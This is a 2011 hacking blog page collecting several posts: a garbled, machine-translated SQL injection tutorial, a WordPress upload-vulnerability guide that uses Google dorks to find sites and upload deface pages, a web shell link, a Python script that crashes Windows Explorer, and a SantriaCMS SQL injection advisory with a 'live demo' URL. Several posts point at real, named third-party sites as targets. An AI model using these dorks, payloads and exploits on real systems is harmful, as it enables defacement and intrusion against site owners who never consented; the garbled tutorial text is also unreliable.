Friday, December 30, 2011

SQL injection courseSQL injection course

Some information on the Internet in search of at least some of the SQL injection is often a matter of course or if you are not satisfied with anything else, covering, or is that not clear either, must have come across very short or articles. you and me to grasp the subtleties of this gap on the subject of many articles where we've collected 1-20. And then it did not harm others, remembering to say, so I decided to write a FAQ on this issue fully. And once again we ask. Those who will find something you missed in the wrong place, so please otpishites below, all the same it is difficult, all to keep in mind. In the meantime, this is my first post, and please do not throw tomatoes, not kicked.

I will not do a SQL injection is probably not for you then know what is the first day of an article carried by breaking away. The necessary information so that the attacker was a query from the database, then changes to the database where the simple injection SQL injection attack is a type of the original query.



Assimilation is required for this article:
a) The presence of brain
b) Direct hands
a) Knowledge of SQL language



Basically, this article is written for PHP MYSQL MSSQL, but there are a few examples.

In fact, the best way but, SQL injection is not reading this article to find out running smoothly as a living like to think that the most precise application, write or use a scenario set out on my end.

Each paragraph was important for the next item, etc., because the meantime, I recommend to read all

Unfortunately, until the paper is divided into several messages does not match the 20,000-character limit.

Still pretty easy. We have all the fields, variables, cookies and should bury a pair of single quotes.


1.1 In the first case

script here



_http: / / xxx / news.php? Id = 1

Suppose the original request to the database as follows:

Note: SELECT * FROM news WHERE id = '1 ';

Quote Now append variable, therefore, such as "id"



_http: / / xxx / news.php? Id = 1 '

variable is not filtered and contains the error messages will appear something like this:

mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control

Since an extra query to the database might offer:

SELECT * FROM news WHERE id = '1'';

error reporting is turned off in this case, we would not be confused with such deficits in paragraph 1.4 (also does not prevent it, can determine the presence of. the same as described in

paragraph): _http: / / xxx / news.php? Id = 1 '; -

Will now query the database:

SELECT * FROM news WHERE id = '1 '; -';

(For those who tank "-" a sign of the beginning of all comments after it is thrown, it is still (so is written documentation, since that space must be sure that I would like to draw your attention to the fact that MySQL) and a road in front of him). Thus, for the MySQL query remains the same and looks the same



_http: / / xxx / news.php? Id = 1

Easy Comment WordPress upload Vulnerability|10000 of wordpress sites vulnerable with

Hi Guyz this is a Tutorial How to Hack WordPress, This is File Upload Vulnerability , its not professional hacking tutorial but its a kind of hacking trick, we will hack web site/wordpress through simple deface page upload,
Follow step by step |
  • 1. Go to Google.com and paste this dork 3 Dorks
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Index of /wp-content/plugins/easy-comment-uploads

  • 2.Now you will Found hug of Web sites select any one web site or Open it
  • 3. And Upload your Defacepage
Now This Tutorial with an Example and Screenshots:
  • I paste dorks on Google and i found 5490 wordpress vulnerable web sites in 0.27 seconds [IMG]file:///C:/DOCUME%7E1/WINDOW%7E1/LOCALS%7E1/Temp/msohtmlclip1/01/clip_image001.gif[/IMG]
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Index of /wp-content/plugins/easy-comment-uploads

  • And i found this site :
http://www.findthepearl.com/
This is Vulnerable Area http://www.findthepearl.com/wp-conte...mment-uploads/



Sorry For Any Mistake

Readable Directories v 0.2

Doar in citire = Read only
Atat in citire cat si scriere = permision 777

Download: http://www.multiupload.com/BE8TUAB0H6

source : http://r3vyk.info/readable-directories-v-0-2.r3v

New Fresh Sh3ll For You

Hi Guys Here Is a new Fresh sh3ll for you guys

PHP Code:
clarkee.com/cat.php 
Do Not Remove IT

Rep+ And Push TNX Pls

Windows Explorer Denial Of Service (DOS)Windows Explorer Denial Of Service (DOS)

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack
 
from win32com.shell import shell, shellcon
from os import mkdir
 
try:
    mkdir("c:\\trigger_alt")
except:
    print "[!] Trigger Directory Exists"
try:
    mkdir("c:\\trigger_alt\\....")
except:
    print "[!] Trigger Sub Directory Exists"
 
print "[!] Triggering Issue"
 
# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete
 
shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

SantriaCMS SQL Injection Vulnerability

# Author : Troy
# Date : Thursday, Dec 08, 2011
# Location : /home/troy
#
# -------- CMS info -----------
# Vendor : http://www.jasawebsitemurah.info/cms/
# Exploit title : SantriaCMS SQL Injection Vulnerability
# Dork : "view.php?idArtikel="
# Version : Null/1.0 mybe
# Tested On : LocalHost
# -----------------------------
#
# Internet For Freedom

# Exploit
#
# http://localhost/cms/
#
# http://localhost/cms/view.php?idArtikel=[SQL]
#
# Live Demo : http://www.nopalindonesia.com/view.php?idArtikel=65
thanks+rep if u like

Newer Posts Older Posts Home